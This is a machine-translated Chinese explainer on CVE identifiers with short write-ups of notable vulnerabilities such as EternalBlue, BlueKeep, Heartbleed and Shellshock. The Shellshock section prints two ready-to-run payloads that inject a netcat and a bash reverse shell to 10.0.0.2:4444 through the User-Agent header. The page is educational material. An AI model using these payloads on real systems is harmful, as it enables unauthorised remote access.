常见漏洞与暴露


文档摘要

常见漏洞与暴露 CVE(Common Vulnerabilities and Exposures,常见漏洞与暴露)是为公开已知的网络安全漏洞分配的唯一标识符。CVE 有助于标准化漏洞的命名和跟踪,使组织、安全专业人员和软件供应商能够更轻松地共享信息并管理与这些漏洞相关的风险。每个 CVE 条目都包含对漏洞的简要描述、其潜在影响以及受影响软件或系统的相关详细信息。 概述 工具 过去 15 年中的重大 CVE CVE-2017-0144 - EternalBlue CVE-2017-5638 - Apache Struts 2 CVE-2018-7600 - Drupalgeddon 2 CVE-2019-0708 - BlueKeep CVE-2019-19781 - Citrix ADC

常见漏洞与暴露

CVE(Common Vulnerabilities and Exposures,常见漏洞与暴露)是为公开已知的网络安全漏洞分配的唯一标识符。CVE 有助于标准化漏洞的命名和跟踪,使组织、安全专业人员和软件供应商能够更轻松地共享信息并管理与这些漏洞相关的风险。每个 CVE 条目都包含对漏洞的简要描述、其潜在影响以及受影响软件或系统的相关详细信息。

概述

工具

过去 15 年中的重大 CVE

CVE-2017-0144 - EternalBlue

EternalBlue 利用 Microsoft 在服务器消息块 (SMB) 协议实现中发现的一个漏洞。该漏洞的存在是因为 Microsoft Windows 各个版本中的 SMB 版本 1 (SMBv1) 服务器会错误处理来自远程攻击者的特制数据包,从而允许攻击者在目标计算机上执行任意代码。

受影响的系统:

  • Windows Vista SP2
  • Windows Server 2008 SP2 和 R2 SP1
  • Windows 7 SP1
  • Windows 8.1
  • Windows Server 2012 Gold 和 R2
  • Windows RT 8.1
  • Windows 10 Gold、1511 和 1607
  • Windows Server 2016

CVE-2017-5638 - Apache Struts 2

3 月 6 日,Apache Struts 2 中的一个新的远程代码执行 (RCE) 漏洞被公开。这个最新的漏洞 CVE-2017-5638 允许远程攻击者通过“Content-Type”标头将操作系统命令注入到 Web 应用程序中。

CVE-2018-7600 - Drupalgeddon 2

Drupal 7.x 和 8.x 的多个子系统中存在一个远程代码执行漏洞。这可能使攻击者能够在 Drupal 站点上利用多种攻击向量,从而导致站点完全被攻破。

CVE-2019-0708 - BlueKeep

在远程桌面服务(以前称为终端服务)中,当未经身份验证的攻击者使用 RDP 连接到目标系统并发送特制请求时,就存在一个远程代码执行漏洞。此漏洞无需身份验证,也不需要用户交互。成功利用此漏洞的攻击者可以在目标系统上执行任意代码。随后,攻击者可以安装程序;查看、更改或删除数据;或创建具有完全用户权限的新账户。

CVE-2019-19781 - Citrix ADC Netscaler

Citrix 应用程序交付控制器 (ADC),即以前称为 NetScaler ADC 的产品,以及 Citrix Gateway,即以前称为 NetScaler Gateway 的产品,存在一个远程代码执行漏洞。如果被利用,该漏洞可能使未经身份验证的攻击者能够执行任意代码。

受影响的产品:

  • Citrix ADC 和 Citrix Gateway 版本 13.0 的所有受支持版本
  • Citrix ADC 和 NetScaler Gateway 版本 12.1 的所有受支持版本
  • Citrix ADC 和 NetScaler Gateway 版本 12.0 的所有受支持版本
  • Citrix ADC 和 NetScaler Gateway 版本 11.1 的所有受支持版本
  • Citrix NetScaler ADC 和 NetScaler Gateway 版本 10.5 的所有受支持版本

CVE-2014-0160 - Heartbleed

Heartbleed 漏洞是流行的 OpenSSL 加密软件库中的一个严重漏洞。这一弱点允许窃取在正常情况下由用于保护互联网的 SSL/TLS 加密所保护的信息。SSL/TLS 为 Web、电子邮件、即时通讯 (IM) 以及某些虚拟专用网络 (VPN) 等应用提供互联网上的通信安全和隐私。

CVE-2014-6271 - Shellshock

Shellshock,也称为 Bashdoor,是广泛使用的 Unix Bash shell 中的一系列安全漏洞,其中第一个漏洞于 2014 年 9 月 24 日披露。许多面向互联网的服务,例如某些 Web 服务器部署,使用 Bash 处理特定请求,这使得攻击者能够诱使易受攻击的 Bash 版本执行任意命令。这可能使攻击者获得对计算机系统的未授权访问。

echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 10.0.0.2 4444 -e /bin/sh\r\n" curl --silent -k -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.0.0.2/4444 0>&1" "https://10.0.0.1/cgi-bin/admin.cgi"

参考文献

免责声明
本文件由基于人工智能的机器翻译服务翻译而成。尽管我们力求翻译准确,但请注意,自动翻译可能包含错误或不准确之处。应以原始语言版本的文件为准。对于关键信息,建议使用专业人工翻译。对于因使用本翻译而产生的任何误解或误读,我们概不负责。


发布者: 作者: 转发
评论区 (0)
U